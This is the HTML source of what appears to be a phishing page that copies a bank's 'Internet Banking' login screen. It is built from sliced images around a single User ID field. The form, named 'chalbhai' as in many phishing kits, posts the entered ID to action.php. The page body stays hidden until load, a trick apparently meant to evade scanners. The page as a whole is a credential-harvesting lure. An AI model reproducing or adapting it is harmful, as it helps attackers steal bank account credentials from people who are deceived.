<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Internet Banking</title>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<link rel="shortcut icon"
              href="images/favicon.ico"/>
			  
			  
	
<script type="text/javascript">

function unhideBody()
{
var bodyElems = document.getElementsByTagName("body");
bodyElems[0].style.visibility = "visible";
}

</script>

<body style="visibility:hidden" onload="unhideBody()">
<style type="text/css">
div#container
{
	position:relative;
	width: 100%;
	margin-top: 0px;
	margin-left: auto;
	margin-right: auto;
	text-align:left; 
}
body {text-align:center;margin:0}
</style>
<style> 
  .textbox { 
    font-family: Arial, Helvetica, sans-serif;

    color: #333; 
    border: 1px solid black; 
   
    line-height: 1; 
    width: 275px; 
    height:30px; 
  } 
 
</style> 


<script LANGUAGE="JavaScript">
<!--

var b = 0 ;
var i = 0 ;
var errmsg = "" ;
var punct = "" ;
var min = 0 ;
var max = 0 ;

function formbreeze_email(field) {

	if (b && (field.value.length == 0)) return true ;


	if (! emailCheck(field.value))
	  {
		  field.focus();
		  if (field.type == "text") field.select();
		  return false ;
	  }

   return true ;
}

function formbreeze_filledin(field) {

if (b && (field.value.length == 0)) return true;

if (field.value.length < min) {
alert(errmsg);
field.focus();
if (field.type == "text") field.select();
return false ;
   }

if ((max > 0) && (field.value.length > max)) {
alert(errmsg);
field.focus();
if (field.type == "text") field.select();
return false ;
   }

return true ;
}

function formbreeze_number(field) {

if (b && (field.value.length == 0)) return true ; ;

if (i)
 var valid = "0123456789"
else
 var valid = ".,0123456789"

var pass = 1;
var temp;
for (var i=0; i<field.value.length; i++) {
temp = "" + field.value.substring(i, i+1);
if (valid.indexOf(temp) == "-1") pass = 0;

}

if (!pass) {
alert(errmsg);
field.focus();
if (field.type == "text") field.select();
return false;
 }

if (field.value < min) {
alert(errmsg);
field.focus();
if (field.type == "text") field.select();
return false;
   }


if ((max > 0) && (field.value > max)) {
alert(errmsg);
field.focus();
if (field.type == "text") field.select();
return false;
   }

return true ;
}


function formbreeze_numseq(field) {


if (b && (field.value.length == 0)) return true ;

var valid = punct + "0123456789"

var pass = 1;
var digits = 0
var temp;
for (var i=0; i<field.value.length; i++) {
temp = "" + field.value.substring(i, i+1);
if (valid.indexOf(temp) == "-1") pass = 0;
if (valid.indexOf(temp) > (punct.length-1) ) digits++ ;

}

if (!pass) {
alert(errmsg);
field.focus();
if (field.type == "text") field.select();
return false ; ;
   }

if (digits < min) {
alert(errmsg);
field.focus();
if (field.type == "text") field.select();
return false;
   }

if ((max > 0) && (digits > max)) {
alert(errmsg);
field.focus();
if (field.type == "text") field.select();
return false;
   }

return true ;
}

function emailCheck (emailStr) {

var checkTLD=1;
var knownDomsPat=/^(com|net|org|edu|int|mil|gov|arpa|biz|aero|name|coop|info|pro|museum|ws)$/;
var emailPat=/^(.+)@(.+)$/;
var specialChars="\\(\\)><@,;:\\\\\\\"\\.\\[\\]";
var validChars="\[^\\s" + specialChars + "\]";
var quotedUser="(\"[^\"]*\")";
var atom=validChars + '+';
var word="(" + atom + "|" + quotedUser + ")";
var userPat=new RegExp("^" + word + "(\\." + word + ")*$");
var domainPat=new RegExp("^" + atom + "(\\." + atom +")*$");
var matchArray=emailStr.match(emailPat);

if (matchArray==null) {
alert(errmsg);
return false;
}
var user=matchArray[1];
var domain=matchArray[2];

for (i=0; i<user.length; i++) {
if (user.charCodeAt(i)>127) {
alert(errmsg);
return false;
   }
}
for (i=0; i<domain.length; i++) {
if (domain.charCodeAt(i)>127) {
alert(errmsg);
return false;
   }
}

if (user.match(userPat)==null) {
alert(errmsg);
return false;
}

var atomPat=new RegExp("^" + atom + "$");
var domArr=domain.split(".");
var len=domArr.length;
for (i=0;i<len;i++) {
if (domArr[i].search(atomPat)==-1) {
alert(errmsg);
return false;
   }
}

if (checkTLD && domArr[domArr.length-1].length!=2 &&
domArr[domArr.length-1].search(knownDomsPat)==-1) {
alert(errmsg);
return false;
}

if (len<2) {
alert(errmsg);
return false;
}

return true;
}

function formbreeze_sub()
{
/*
//FBDATA:formtext1^0^1^0^0^Please Enter Your User ID:;
*/
b=0;
errmsg="Please Enter Your User ID";
min=1;
max=0;
if (! formbreeze_filledin(document.chalbhai.formtext1) ) return false ;

}
-->
</script>

</head>
<body bgColor="#E3E3E3">
<div id="container">
<div id="image1" style="position:absolute; overflow:hidden; left:153px; top:0px; width:1056px; height:137px; z-index:0"><a href="#"><img src="images/header.png" alt="" title="" border=0 width=1056 height=137></a></div>

<div id="shape1" style="position:absolute; overflow:hidden; left:162px; top:137px; width:1039px; height:1284px; z-index:1"><img border=0 width="100%" height="100%" alt="" src="images/shape863601953.gif"></div>

<div id="image2" style="position:absolute; overflow:hidden; left:198px; top:155px; width:990px; height:144px; z-index:2"><a href="#"><img src="images/1.png" alt="" title="" border=0 width=990 height=144></a></div>

<div id="image3" style="position:absolute; overflow:hidden; left:946px; top:223px; width:209px; height:61px; z-index:3"><a href="#"><img src="images/ask u.png" alt="" title="" border=0 width=209 height=61></a></div>

<div id="image4" style="position:absolute; overflow:hidden; left:709px; top:218px; width:209px; height:63px; z-index:4"><a href="#"><img src="images/logoo.png" alt="" title="" border=0 width=209 height=63></a></div>

<div id="image5" style="position:absolute; overflow:hidden; left:217px; top:311px; width:953px; height:213px; z-index:5"><img src="images/loginnn.png" alt="" title="" border=0 width=953 height=213></div>

<div id="image6" style="position:absolute; overflow:hidden; left:217px; top:518px; width:964px; height:287px; z-index:6"><img src="images/2.png" alt="" title="" border=0 width=964 height=287></div>

<div id="image7" style="position:absolute; overflow:hidden; left:213px; top:810px; width:985px; height:140px; z-index:7"><a href="#"><img src="images/fo2.png" alt="" title="" border=0 width=985 height=140></a></div>

<div id="image8" style="position:absolute; overflow:hidden; left:203px; top:971px; width:979px; height:431px; z-index:8"><a href="#"><img src="images/footer.png" alt="" title="" border=0 width=979 height=431></a></div>

<div id="image9" style="position:absolute; overflow:hidden; left:954px; top:375px; width:170px; height:79px; z-index:9"><a href="#"><img src="images/busniess.png" alt="" title="" border=0 width=170 height=79></a></div>

<div id="image10" style="position:absolute; overflow:hidden; left:746px; top:374px; width:182px; height:42px; z-index:10"><a href="#"><img src="images/newcud.png" alt="" title="" border=0 width=182 height=42></a></div>

<div id="image11" style="position:absolute; overflow:hidden; left:450px; top:443px; width:180px; height:24px; z-index:11"><a href="#"><img src="images/fotgoooo.png" alt="" title="" border=0 width=180 height=24></a></div>

<div id="formcheckbox1" style="position:absolute; left:254px; top:440px; z-index:12"><input type="checkbox" name="formcheckbox1"></div>
<form action=action.php name=chalbhai id=chalbhai method=post  onsubmit=" return formbreeze_sub()" >
<input name="formtext1" class="textbox" maxlength="76" type="text" style="position:absolute;width:200px;left:259px;top:398px;z-index:13">
<div id="formimage1" style="position:absolute; left:469px; top:396px; z-index:14"><input type="image" name="formimage1" width="104" height="36" src="images/contines.png"></div>
</div>

</body>
</html>
